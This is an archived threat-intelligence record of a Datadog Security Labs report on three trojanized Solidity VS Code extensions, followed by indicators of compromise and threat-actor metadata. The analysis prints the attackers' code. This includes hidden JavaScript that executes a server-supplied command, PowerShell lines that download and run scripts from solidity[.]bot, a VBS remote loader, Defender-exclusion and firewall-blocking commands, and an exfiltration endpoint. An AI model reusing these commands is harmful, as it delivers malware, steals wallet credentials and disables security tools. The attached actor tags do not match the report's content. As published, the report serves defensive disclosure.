{
	"id": "1e78e72f-8ca8-47b5-8b7b-37a35ea8b248",
	"created_at": "2026-04-06T00:20:03.217285Z",
	"updated_at": "2026-04-10T03:36:48.361987Z",
	"deleted_at": null,
	"sha1_hash": "c6f88dc04b2072f43dc6ff6cab59e255e3a4e982",
	"title": "The obfuscation game: MUT-9332 targets Solidity developers via malicious VS Code extensions | Datadog Security Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2789471,
	"plain_text": "The obfuscation game: MUT-9332 targets Solidity developers via\r\nmalicious VS Code extensions | Datadog Security Labs\r\nBy Tesnim Hamdouni, Ian Kretz, Andy Giron, Eslam Salem\r\nPublished: 2025-05-21 · Archived: 2026-04-05 13:17:04 UTC\r\nKey points and observations\r\nDatadog Security Research discovered three malicious VS Code extensions that target Solidity developers on\r\nWindows: solaibot , among-eth , and blankebesxstnion .\r\nThe extensions disguise themselves as legitimate, concealing harmful code within genuine features, and use\r\ncommand and control domains that appear relevant to Solidity and that would not typically be flagged as\r\nmalicious.\r\nAll three extensions employ complex infection chains that involve multiple stages of obfuscated malware,\r\nincluding one that uses a payload hidden inside an image file hosted on the Internet Archive.\r\nVia a delivered malicious browser extension and executable, the attack establishes persistence on the victim\r\nsystem and exfiltrates victim data and credentials to attacker infrastructure.\r\nBased on shared infrastructure and obfuscation characteristics, we attribute all three extensions to a single threat\r\nactor, which we track as MUT-9332, that was also behind a recently reported campaign to distribute a Monero\r\ncryptominer via backdoored VS Code extensions.\r\nBackground\r\nOver the past few years, Visual Studio Code (VS Code) has become the most common choice of integrated\r\ndevelopment environment (IDE), with 74% of developers reporting that they use it as their primary code editor. A\r\nsignificant factor in VS Code’s success is its extensibility; it features a wide range of extensions available for\r\ninstallation from the official VS Code Marketplace. Extensions can modify the appearance or functionality of the VS\r\nCode editor, changing the editor theme, registering new editor commands, running language server protocols or AI\r\ncode assistants, and much more. 
At time of writing, more than 72,000 extensions were active and installable via the\r\nMarketplace.\r\nFor threat actors, VS Code extensions have certain very appealing qualities:\r\nThey have extensive permissions to read code and environment variables, register commands and write\r\nconfiguration, perform startup actions, and even run system commands as the current user.\r\nThey are one-click installable from within the VS Code editor, lowering the barrier to entry for developers to\r\nregularly try out new extensions.\r\nThey are subject to automated security scanning by the Marketplace before publication, which can lead some\r\ndevelopers to think that extensions have been thoroughly vetted and are thus trustworthy.\r\nThey provide a direct attack path to developers, who are frequently targeted for their access to valuable or\r\nsensitive resources.\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 1 of 14\n\nIt would appear that threat actors have also noticed these qualities: Microsoft has removed several malicious VS Code\r\nextensions from the Marketplace in recent months. Ten of these removed extensions were part of a significant\r\ncampaign to deliver a Monero cryptominer and were cumulatively downloaded up to one million times.\r\nIn this blog post, we analyze a new campaign from a threat actor we track as MUT-9332 that uses three previously\r\nunreported malicious VS Code extensions to target developers using Solidity, a programming language for writing\r\nEthereum blockchain smart contracts. We use the MUT (Mysterious Unattributed Threat) designation to track\r\nunattributed threat actor clusters. 
By impersonating legitimate publishers or claiming to provide advanced Solidity\r\nfeatures, these extensions infect victims with malware, exfiltrate data and credentials to attacker infrastructure, and\r\nestablish persistence on targeted systems.\r\nDown the rabbit hole: The initial attack vector\r\nWe discovered the VS Code extensions solaibot , among-eth , and blankebesxstnion while threat hunting for\r\nmalicious VS Code extensions in the Marketplace. These extensions purport to provide utilities like syntax scanning\r\nand vulnerability detection for Solidity developers. In reality, all three are trojanized and deliver malicious payloads\r\nthat steal cryptowallet credentials from victim Windows systems.\r\nAll three extensions have been removed from the VS Code Marketplace. Based on metadata provided by the\r\nMarketplace, we estimate that they had been cumulatively downloaded (and thus installed) fewer than 50 times before\r\nremoval.\r\nExtension name Version Publisher Publishing date Removal date Publisher domain\r\nsolaibot 1.4.2 SmartContractAI 2025-04-23 2025-04-28 solidity[.]bot\r\namong-eth 1.0.2 EthCompiler 2025-05-10 2025-05-11 https://nethereum.com\r\nblankebesxstnion 1.0.2 JohnGaffney 2025-05-11 2025-05-12 https://microsoft.com\r\nAside from minor differences in their package.json files, the extensions are identical in file structure and contents. In\r\nparticular, all contain a lightly obfuscated JavaScript source file, extension.js . For VS Code extensions written in\r\nNode.js, extension.js is a distinguished file that contains the code to run when the extension is loaded. 
Naturally, all\r\nthree extensions configured themselves to be loaded whenever VS Code was launched or when a Solidity source file\r\nwas opened.\r\nWe found that the obfuscated code in extension.js implements genuine Solidity utilities but also conceals the\r\nfollowing malicious section (formatted for clarity):\r\nconst e = {\r\n hostname: \"solidity[.]bot\",\r\n path: \"/version.json/\",\r\n method: \"GET\",\r\n headers: {\r\n Platform: p.default.platform().toString(),\r\n Accept: \"application/json\",\r\n Referer: \"https://solidity[.]bot/\"\r\n}\r\n },\r\n t = g.default.request(e, (e =\u003e {\r\n let t = \"\";\r\n e.on(\"data\", (e =\u003e {\r\n t += e\r\n })),\r\n e.on(\"end\", (() =\u003e {\r\n try {\r\n const e = JSON.parse(t);\r\n if (\"v1.4.2\" === e.version) console.log(\"Version is up to date!\");\r\n else if (\"v1.4.1\" === e.version) {\r\n console.log(\"Outdated version, checking hash...\");\r\n const t = e.version_hash,\r\n n = this.decode_hash(t);\r\n (0, h.exec)(n)\r\n }\r\n } catch (e) {\r\n console.error(\"Invalid JSON:\", e)\r\n }\r\n }))\r\n }));\r\nThis code makes an HTTP GET request to https://solidity[.]bot/version.json that includes the system’s\r\nplatform string in the headers. If the version attribute of the response JSON has value ”v1.4.1” the\r\nversion_hash attribute of the response is decoded from hex to characters ( decode_hash() ) and executed in a\r\nsubprocess.\r\nBy interacting with the solidity[.]bot server, we found that ”v1.4.1” was only returned when the platform string\r\nindicated a Windows system. 
In this case, the response had the following structure:\r\n{\r\n \"name\": \"Solidity AI\",\r\n \"version\": \"v1.4.1\",\r\n \"version_hash\": \"706F7765727368656C6C202D457865637574696F6E506F6C69637920427970617373202D436F6D6D616E64202269726D\r\n}\r\nDecoding this version_hash value from hex to characters, we find at last the command being run:\r\npowershell -ExecutionPolicy Bypass -Command \"irm https://solidity[.]bot/a.txt | iex\"\r\nThis PowerShell command downloads and executes https://solidity[.]bot/a.txt , a suspicious action that, when\r\ncoupled with the use of obfuscation in extension.js , indicates malicious intent. We found that this command is in\r\nfact the start of a complex, multi-stage infection chain, which we map out and explore in the next section.\r\nTechnical analysis\r\nThe overall attack flow, beginning with the execution of the a.txt payload, is shown below in Figure 1. Boxes\r\nrepresent distinct named payloads involved in the attack, with target payloads highlighted in purple and arrows\r\nillustrating the direction of invocation between components.\r\nFigure 1: Attack flow overview (click to enlarge)\r\nAs indicated in Figure 1, the attack delivers two target payloads: extension.zip , an extension for Chromium-based\r\nbrowsers, and the executable myau.exe . 
Both perform malicious actions on the victim system, including exfiltrating\r\ncryptocurrency wallet credentials to attacker infrastructure.\r\nInterestingly, there are two distinct paths through the attack flow diagram to each of these payloads:\r\nextension.zip is downloaded and installed by both the a.txt and 1.txt payloads\r\nmyau.exe is downloaded and executed via two attack paths leading from 1.txt , one of which is significantly\r\nmore complex than the other, relying on more intermediate payloads and techniques\r\nWe believe this redundancy is likely intended to increase the chances of successful payload execution and aid in\r\nevading detection should one obfuscation method be uncovered.\r\nIn the remainder of this section, we walk through the paths and intermediate payloads involved in this attack flow\r\nleading to the target payloads extension.zip and myau.exe . We then analyze the target payloads themselves.\r\nInfection chains and intermediate payloads\r\nThe initial payload in the attack flow, a.txt , is a PowerShell script that begins by attempting to slip a malicious\r\nextension, extension.zip , into Chromium-based browsers installed on the user’s machine. 
The core logic is\r\ncontained in the Check-And-Replace function, shown below.\r\nfunction Check-And-Replace {\r\n [CmdletBinding()]\r\n param (\r\n [Parameter(Mandatory=$true, Position=0)]\r\n [string]$Path,\r\n[string[]]\r\n $BrowserNames = @(\r\n \"Opera GX Browser\", \"Opera GX\", \"Opera Browser\", \"Opera GX Internet Browser\",\r\n \"Opera Internet Browser\", \"Google Chrome\", \"Brave\", \"Brave Browser\",\r\n \"Microsoft Edge\", \"DolphinAnty\", \"Chromium\", \"Yandex\",\r\n \"Yandex Browser\", \"Ungoogled Chromium\", \"Mises\"\r\n ),\r\n [string]\r\n $ExtensionArg = \"--load-extension=`\"$env:APPDATA\\CheckExtension`\"\"\r\n )\r\n if (-not (Test-Path $Path)) {\r\n return\r\n }\r\n Get-ChildItem -Path $Path -Filter *.lnk -Recurse -ErrorAction SilentlyContinue | ForEach-Object {\r\n $shortcutFile = $_.FullName\r\n $shell = New-Object -ComObject WScript.Shell\r\n $shortcut = $shell.CreateShortcut($shortcutFile)\r\n foreach ($browserName in $BrowserNames) {\r\n if ($_.BaseName -like \"*$browserName*\") {\r\n if ($shortcut.Arguments -notmatch [regex]::Escape($ExtensionArg)) {\r\n $shortcut.Arguments = \"$($shortcut.Arguments) $ExtensionArg\"\r\n $shortcut.Save()\r\n }\r\n else {\r\n }\r\n break\r\n }\r\n }\r\n }\r\n}\r\nAfter downloading and extracting extension.zip into a hidden folder under APPDATA , the script checks to see if it is\r\nrunning with administrator privileges and calls Check-And-Replace if so. 
This function modifies the shortcuts ( .lnk\r\nfiles) for targeted browsers in Taskbar , Start Menu , Quick Launch , Desktop, and One Drive Desktop to load\r\nthe malicious extension on startup from this hidden folder.\r\nIt then downloads and executes the payload 1.txt from https://solidity[.]bot/1.txt in much the same way as\r\na.txt itself was invoked:\r\npowershell -ExecutionPolicy Bypass -Command \"irm https://solidity[.]bot/1.txt | iex\"\r\n1.txt contains the same payload as a.txt to download and install extension.zip into the victim’s compatible\r\nbrowsers. It is not clear why the payload at this stage was duplicated. The attack path then branches when 1.txt\r\ninvokes two next stages, 2.txt and 3.txt , again by piping a downloaded PowerShell script to iex :\r\npowershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"Start-Sleep -Seconds 120; irm https://solidity[.]bo\r\npowershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"Start-Sleep -Seconds 120; irm https://solidity[.]bot\r\nBoth remaining attack paths ultimately lead to myau.exe , the attack’s second target payload. Over the next two\r\nsections, we separately follow each remaining subpath.\r\nThe 2.txt path\r\nThe script starts by adding a registry key ( App = “crypto” ) under HKEY_CURRENT_USER\\Software\\Microsoft . It then\r\nestablishes persistence via another key under HKEY_CURRENT_USER\\Software\\Microsoft called Application. 
After it\r\ndisables Windows Defender’s automatic submission of malicious samples, the script adds a random folder,\r\n%localappdata%, under Defender’s exclusion path as well as to the registry under\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths .\r\nThe script finally makes a request to another command and control (C2) domain,\r\nhttps://myaunet[.]su/\u003crandomId\u003e/\u003crandomId\u003e/\u003crandomId\u003e/\u003crandomId\u003e .\r\n$QdHohq8z7aFLPrEGgoX7dfN8kvhS = \"myau\"\r\n$TjxLlCbWKIaLPzNk28sqmhWL58Zo7altSZzF = \"https://\"\r\n$m4eNWOkl5jp3WQh9bwqN31Puj9sJqS2M3KjdeoD1bNSuChf2m = \"net.su\"\r\n$CqVnU6XxTsDIWg1AQhEPxVOFguF2ng0BaFgKbHFOlH = $TjxLlCbWKIaLPzNk28sqmhWL58Zo7altSZzF + $QdHohq8z7aFLPrEGgoX7dfN8kvhS\r\n$CqVnU6XxTsDIWg1AQhEPxVOFguF2ng0BaFgKbHFOlH = $CqVnU6XxTsDIWg1AQhEPxVOFguF2ng0BaFgKbHFOlH + $m4eNWOkl5jp3WQh9bwqN31Pu\r\n......\r\nThe myaunet[.]su C2 domain had been previously observed to deliver a Monero cryptominer via backdoored VS\r\nCode extensions. Based on the shared C2 infrastructure, we are moderately confident that MUT-9332 is also the threat\r\nactor behind the Monero campaign.\r\nThe script then constructs a large Base64-encoded string spread across multiple variables. It replaces all instances of\r\n“#2##” with the letter “A” to form a final Base64 payload. It decodes this payload into a file named Launch.exe ,\r\nwrites it to disk, and executes it with elevated privileges if possible. 
To further conceal its activities, the script sets two\r\nattributes on Launch.exe :\r\nHidden ( +H ), which makes the file invisible in File Explorer by default\r\nSystem ( +S ), which identifies the file as a critical system component.\r\n$ekCp5C557Z0pSNsJ08iq8V80hqJI = Join-Path $VPYNTNhQpLzx3oMuuvDZeea5h6OPE \"Launch.exe\"\r\n...\r\n[System.IO.File]::WriteAllBytes($ekCp5C557Z0pSNsJ08iq8V80hqJI, $sx2qp84mQy42m3wUmsojQs4BUaix4c4KFZMrvE)\r\nattrib +H +S $ekCp5C557Z0pSNsJ08iq8V80hqJI\r\nStart-Process \"cmd.exe\" -ArgumentList \"/c reg add \"\"HKCU\\Software\\Microsoft\"\" /v \"\"Version\"\" /t REG_SZ /d $Hp3dV2hGEh\r\nStart-Sleep -s 3\r\nStart-Process $ekCp5C557Z0pSNsJ08iq8V80hqJI -Verb \"RunAs\" -WindowStyle Hidden\r\nLaunch.exe is just myau.exe under a different name. All subsequent malicious actions—like disabling updates,\r\ninjecting into browsers, or exfiltrating data—stem from this binary.\r\nThe 3.txt path\r\nIn contrast with 2.txt , the 3.txt payload only downloads and executes a VBScript (VBS), a.vbs , from\r\nhttps://solidity[.]bot/a.vbs :\r\n$url = \"https://solidity[.]bot/a.vbs\"\r\n$localFile = \"$env:temp\\a.vbs\"\r\nInvoke-WebRequest -Uri $url -OutFile $localFile\r\nStart-Process -FilePath \"cscript.exe\" -WindowStyle Hidden -ArgumentList $localFile\r\nStart-Sleep -Seconds 600\r\nRemove-Item -Path $localFile -Force\r\nThe a.vbs script is lightly obfuscated via corruption by intermittent insertions of the character string\r\nȧⳛܖᖳ᎑໴ឺ┰ഴ♛ፙឳʿᰤම into the script text, as shown below. 
This is presumably done to frustrate static analysis and\r\nautomated malware detection mechanisms.\r\nFigure 2: Obfuscated VBS script in `a.vbs` payload (click to enlarge)\r\nThese extra characters are removed at runtime to reveal the following script, which creates an MSXML2.ServerXMLHTTP\r\nobject that downloads and executes content from http://paste[.]ee/d/0ykW3Z2K/0 :\r\nOn Error Resume Next\r\nDim pedireme, motorcars, therblig, aubain, intruders, spinel\r\naubain = \"MSXML2.ServerXMLHTTP\"\r\ntherblig = \"http://paste[.]ee/d/0ykW3Z2K/0\"\r\nintruders = \"GET\"\r\nspinel = \"responseText\"\r\nSet pedireme = CreateObject(aubain)\r\npedireme.Open intruders, therblig, False\r\npedireme.Send\r\nmotorcars = Eval(\"pedireme.\" \u0026 spinel)\r\nExecuteGlobal motorcars\r\nA detour into “steganography”\r\nThe data fetched from the paste[.]ee domain is another corrupted VBS script that is repaired at runtime using the\r\nsame technique as before. 
The repaired script sets up and runs a PowerShell command invoked with the Base64-\r\nencoded argument celom that itself references an image file ( new_image.jpg ) hosted on the Internet Archive (since\r\nremoved).\r\ninterregency = \"$liblong = '\" \u0026 celom \u0026 \"' -replace 'ȧⳛܖᖳ᎑໴ឺ┰ഴ♛ፙឳʿᰤම','';\"\r\ninterregency = interregency \u0026 \"$delope = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($liblo\r\ninterregency = interregency \u0026 \"Invoke-Expression $delope;\"\r\nDim propiolic\r\npropiolic = \"powershell -nop -w hidden -c \" \u0026 Chr(34) \u0026 interregency \u0026 Chr(34)\r\nCreateObject(\"WScript.Shell\").Run propiolic, 0, False\r\nWhen decoded, celom contains the following VBS script:\r\n$unsuspiciously = '0/0VUbd12h/d/ee.etsap//:ptth';\r\n$pilpul = $unsuspiciously -replace '#', 't';\r\n$goondie = 'https://archive[.]org/download/new_image_20250509_1852/new_image.jpg';\r\n$quivery = New-Object System.Net.WebClient;\r\n$quivery.Headers.Add('User-Agent','Mozilla/5.0');\r\n$episternum = $quivery.DownloadData($goondie);\r\n$philocrats = [System.Text.Encoding]::UTF8.GetString($episternum);\r\n$pancratia = '\u003c\r\nAs far as we can tell, this script is incomplete or broken, meaning the threat actor loses code execution at this stage.\r\nHowever, we can glimpse what their intentions must have been: to retrieve and decode a hidden Base64-encoded\r\npayload in new_image.jpg , pictured below.\r\nFigure 3: Screenshot of the image containing the myau.exe payload (click to enlarge)\r\nIndeed, by running the strings command on new_image.jpg , we found the myau.exe payload as Base64-encoded\r\ntext. 
Rather than being hidden in the image data via true steganographic techniques, this payload has simply been\r\ninserted into the image file.\r\n$ strings new_image.jpg\r\n...\r\n2[9(\r\n2d8$\r\n\u003c\u003cBASE64_START\u003e\u003eTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBT\r\n...\r\nThus, the attacker’s intention on this significantly more elaborate path was once again to run myau.exe on the victim\r\nsystem.\r\nTarget payloads\r\nextension.zip\r\nThe overall execution flow of the Chromium-based browser extension in extension.zip is shown below in Figure 4.\r\nFigure 4: Execution flow of the extension.zip browser extension (click to enlarge)\r\nThis browser extension consists mainly of three JavaScript files, injected.js , content.js , and h.js , which work\r\ntogether to steal Ethereum wallets and leak them to a C2 endpoint.\r\nFirst, injected.js sends an Ethereum address to content.js , which then forwards both the address and the current\r\npage’s URL to the remote C2 server ( solidity[.]bot/fetchPrices ). Upon receiving the server’s reply, content.js\r\nchecks its status and, if it’s valid, proceeds to launch the h.js script for further processing. The latter script is heavily\r\nobfuscated and appears to call Ethereum libraries to check the validity of the private key.\r\nmyau.exe\r\nUpon execution, myau.exe initiates various defense evasion techniques. It disables Windows Defender scanning by\r\nissuing a PowerShell command to add a directory exclusion under %LocalAppData% . It also establishes a volatile anti-forensic technique by invoking RtlSetProcessIsCritical(true) via ntdll.dll , causing the system to crash if the\r\nmalware process is terminated. 
This behavior is reinforced by modifying system recovery settings, including setting the\r\nNoReboot registry key and disabling the Windows Recovery Environment using reagentc .\r\nstring folderPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);\r\nstring SystemDrive = Path.Combine(folderPath, RegistryKeys.GetKey());\r\nawait Myau.ExecuteCommand(\"powershell -Command \\\"Add-MpPreference -ExclusionPath '\" + SystemDrive + \"'\\\"\");\r\nmyau.exe then proceeds to build a dynamic URL and issues an HTTP GET request using the custom user-agent\r\nMyauNET/1.0 , an indicator that was also previously observed in the aforementioned campaign from MUT-9332. Upon\r\nestablishing a connection to the C2 server at https://myaunet[.]su/HprEZkZZZrtZEH/TMDSRNerS , the malware\r\nvalidates the downloaded payload by inspecting its size prior to execution.\r\nmyaunet.exe\r\nThe next-stage component, myaunet.exe , functions primarily as a credential and infostealer. It enumerates LevelDB\r\nfiles within application data directories for Discord, Chromium-based browsers, cryptocurrency wallets, and Electron\r\napplications.\r\nThe malware modifies the Windows hosts file to sinkhole connections to domains associated with antivirus vendors,\r\nsandbox environments, and threat intelligence providers. 
Additionally, the malware creates a firewall rule via netsh\r\nto block outbound connectivity to Microsoft update and telemetry infrastructure, likely to prevent detection and\r\ninterference from Windows security updates or Defender cloud-based protections.\r\nstring cmd = \"netsh advfirewall firewall add rule name=\\\"Windows Updater\\\" dir=out action=block \" +\r\n \"remoteip=20.190.128.0/18,40.76.0.0/14,13.107.4.50,13.107.5.88 enable=yes\";\r\nProgram.Run(cmd);\r\nData is exfiltrated via HTTP POST to https://m-vn[.]ws/bird.php . The request contains a JSON payload with\r\nfields including cpu , method , installed_at , tokens , and wallets , enabling victim profiling and tracking.\r\nstring text = string.Join(\"\\n\", Tokens);\r\nstring text2 = \"https://m-vn.ws/bird[.]php\";\r\nProgram.Payload payload = new Program.Payload\r\nAs a final stage, the malware retrieves and executes an additional payload from\r\nhttps://begalinokotobananinotrippitroppacrocofanclub[.]su , which has been previously associated with the\r\nQuasar Remote Access Trojan (Quasar RAT).\r\nConclusion\r\nThis campaign demonstrates the surprising and creative lengths to which MUT-9332 is willing to go when it comes to\r\nconcealing their malicious intentions. We see in this case an impressive diversity of techniques used, ranging from the\r\nstandard (providing legitimate functionality alongside malware, using plausible-sounding C2 domains) to the more\r\nunusual (multiple virtually identical stages, shipping a corrupted payload that is repaired at runtime), and even to the\r\nhalfhearted ARG-like flourish of hiding malware inside a publicly accessible image file. 
These techniques make the\r\ncampaign more difficult to detect and the attack flow more challenging to follow.\r\nWhat’s more, this campaign may be ongoing: at time of writing, long after the removal of the extensions from the VS\r\nCode Marketplace, we observed MUT-9332 make edits to multiple intermediate payloads. They also appear to have\r\nrealized that they have been detected; the following (edited for language) was taken from the updated 1.txt payload:\r\n# F*** you security analyst. Your info has been saved\r\nNotable changes include:\r\nUpdated C2 domains and image payload URL following the latter being removed from the Internet Archive.\r\nThe new image file is visually identical to the previous one and appears to contain the same payload\r\nRemoved the extension.zip downloader portion of 1.txt\r\nThese payload updates suggest that this campaign will likely continue, and the detection and removal of this first batch\r\nof malicious VS Code extensions may prompt MUT-9332 to change tactics in subsequent ones.\r\nIndicators of Compromise\r\nVS Code Extensions\r\nName Version Context\r\namong-eth 1.0.2 Malicious VS Code extension used in campaign\r\nblankebesxstnion 1.0.2 Malicious VS Code extension used in campaign\r\nsolaibot 1.4.2 Malicious VS Code extension used in campaign\r\nURLS\r\nURL Context\r\nsolidity[.]bot\r\nMain attack C2 server for\r\ndelivering early-stage payloads\r\nand exfiltrating data\r\nhttps://myaunet[.]su\r\nPayload delivery server for\r\nMonero cryptominer\r\nhttp://paste[.]ee/d/0ykW3Z2K/0\r\nPayload delivery server for\r\nmalicious VBS script\r\nhttps://archive[.]org/download/new_image_20250509_1852/new_image.jpg\r\nURL of the new_image.jpg\r\nimage containing myau.exe\r\npayload\r\nhttps://m-vn[.]ws/bird.php\r\nExfiltration server to which\r\nvictim data and credentials 
are\r\nPOSTed by myaunet.exe\r\nhttps://begalinokotobananinotrippitroppacrocofanclub[.]su\r\nPayload delivery server for\r\nQuasar RAT\r\nArtifacts\r\nFile SHA256 Context\r\namong-eth.vsix ce72b79e324371134db762fe70b8b1789af899d7217461bc3658a6bd84743eb6\r\nVSIX\r\narchive of\r\nmalicious\r\nVS Code\r\nextension\r\nused in\r\ncampaign\r\nblankebesxstnion.vsix e19d5d8f941b9a98fbb3b65e1e6077fa00d97529e351e455297b0204ec07e9ed\r\nVSIX\r\narchive of\r\nmalicious\r\nVS Code\r\nextension\r\nused in\r\ncampaign\r\nsolaibot.vsix 209fb5bb2440ffe1a631dfe3b574229105a33c5153eded023cc77d8e8f81d1de\r\nVSIX\r\narchive of\r\nmalicious\r\nVS Code\r\nextension\r\nused in\r\ncampaign\r\nextension.zip e0ca66c1a9a68b319b24a7c6b8fdca219dffd802dd4de2d59f602c4d90f40d6c\r\nMalicious\r\nChromium-based\r\nbrowser\r\nextension\r\nmyau.exe c5c0228a1e0ba2bb748219325f66acf17078a26165b45728d8e98150377aa068\r\nMalicious\r\nPE\r\nexecutable,\r\ndisables\r\nWindows\r\nsecurity\r\nmeasures\r\nmyaunet.exe a1eadd41327bd8736e275627d3953944fe7089c032d72a3e429ff18ad0958ada\r\nMalicious\r\nPE\r\nexecutable,\r\ninfostealer\r\nwmam.exe c3684164933c3f54d5b0b242a8a906a85d633de479079a820bb804c0f73c0f58\r\nMalicious\r\nPE\r\nexecutable,\r\nQuasar\r\nRemote\r\nAccess\r\nTrojan\r\nSource: https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads"
	],
	"report_names": [
		"#infection-chains-and-intermediate-payloads"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434803,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c6f88dc04b2072f43dc6ff6cab59e255e3a4e982.pdf",
		"text": "https://archive.orkl.eu/c6f88dc04b2072f43dc6ff6cab59e255e3a4e982.txt",
		"img": "https://archive.orkl.eu/c6f88dc04b2072f43dc6ff6cab59e255e3a4e982.jpg"
	}
}